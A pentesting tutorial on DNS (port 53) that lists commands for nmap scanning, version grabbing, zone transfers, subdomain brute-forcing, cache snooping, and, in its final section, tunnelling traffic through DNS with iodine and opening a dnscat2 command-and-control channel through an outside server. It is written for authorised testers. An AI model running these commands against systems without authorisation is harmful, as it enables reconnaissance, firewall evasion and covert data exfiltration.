Pentesting DNS

DNS Port 53
DNS (Domain Name System) is the backbone of the internet, translating human-readable domain names into IP addresses. It operates primarily on port 53, using UDP for queries and TCP for zone transfers and large responses. DNS is often overlooked, making it an excellent target for reconnaissance, information gathering, and even exploitation in penetration tests.

Discovery and Enumeration

The first step in testing DNS is to discover where it exists and how it behaves. You can use several network scanning techniques detailed here to identify DNS services to focus on for penetration testing.

Scanning for DNS Services

The Nmap tool can be used to scan for DNS targets

nmap -p 53 --open 10.1.1.1            #Check if DNS is running on a target IP
nmap -p 53 --open -iL targets.txt     #Scan multiple DNS servers from a file of targets
nmap -p 53 --open 10.1.1.0/24         #Scan a subnet for open DNS servers
nmap -p 53 -sV 10.1.1.1               #Identify the DNS software and version

You can use dig to identify authoritative name servers.

dig +short NS <target/domain>     #List the nameservers for a domain

Identifying the DNS software version and configuration can reveal potential vulnerabilities to exploit or pivot in an internal environment.

Using Dig for Banner Grabbing

If the server responds with a version number, you can use this information for vulnerability research relating to the specific version.

dig @10.1.1.1 version.bind CH TXT        #Attempt to retrieve DNS server version

Using Nmap for Fingerprinting

nmap -p 53 --script dns-nsid 10.1.1.1                   #Retrieve Name Server Identifier (NSID)
nmap -p 53 --script dns-service-discovery 10.1.1.1      #Discover DNS services

Using Metasploit

use auxiliary/scanner/dns/dns_version        #DNS version enumeration
set RHOSTS 10.1.1.1
run

Once the DNS server type is known, search for public vulnerabilities related to it. All DNS-related exploits found in the Exploit Database can be listed using the following: https://www.exploit-db.com/search?q=DNS

Zone Transfer Attacks

A Zone Transfer allows a secondary DNS server to copy records from the primary DNS server. If misconfigured, attackers can request zone transfers and extract the entire domain structure.

Manual Zone Transfer Attack

If the below is successful, it will leak all DNS records, revealing:

  • Subdomains
  • Internal IPs
  • Mail servers
  • Load balancers
dig axfr @10.1.1.1                          #Attempt a zone transfer without the domain name      
dig axfr @<target-ip> <target-domain>       #Attempt a full zone transfer

Subdomain and Record Enumeration

Finding subdomains and DNS records can uncover hidden assets within an organization.

Enumerate All DNS Records

dig ANY <target-domain> @<target-ip>      #Query all available records

Brute-Force Subdomains with Nmap

nmap --script dns-brute -p 53 10.1.1.1     #Attempt subdomain brute-force

Enumerate Subdomains Using a Wordlist

You can use dig with a wordlist containing domain names and script it to test for valid DNS names.

for sub in $(cat subdomains.txt); do dig +short $sub.<target-domain>; done

Using Fierce for Automated DNS Enumeration

Fierce is a DNS reconnaissance tool for locating non-contiguous IP space. It can also be used for DNS enumeration and finding hidden services running under subdomains. It can be found here.

fierce --domain <target-domain> --dns-servers <target-ip>

DNS Cache Snooping

DNS Cache Snooping allows an attacker to determine what domains have been recently queried by a DNS resolver.

Checking If a Domain is Cached

If the response to the command below contains an answer, it means the domain has been queried before.

dig @<target-ip> <target-domain> +norecurse      #Check if a domain is cached

Using Nmap for DNS Snooping

nmap --script dns-cache-snoop -p 53 10.1.1.1

DNS Tunneling and Data Exfiltration

DNS can be abused to bypass security measures by exfiltrating data through DNS queries, which is excellent for penetration testers and Red Team exercises.

Using Iodine for DNS Tunneling

Iodine is software that lets you tunnel IPv4 data through a DNS server. This can be useful in situations where internet access is firewalled but DNS queries are allowed. You can find Iodine here.

  • Start an Iodine DNS tunnel server on an external system:
iodined -f -c -P secretpassword 10.1.1.1 tunnel.example.com
  • Connect to the tunnel from the target system
iodine -P secretpassword tunnel.example.com

Traffic should now be tunnelled through DNS queries, bypassing firewalls.

Using DNScat2 for Command Execution Over DNS

DNScat2 is a tool for creating an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network. You can find DNScat2 here.

dnscat2 10.1.1.1        #Establishes a command-and-control (C2) channel over DNS.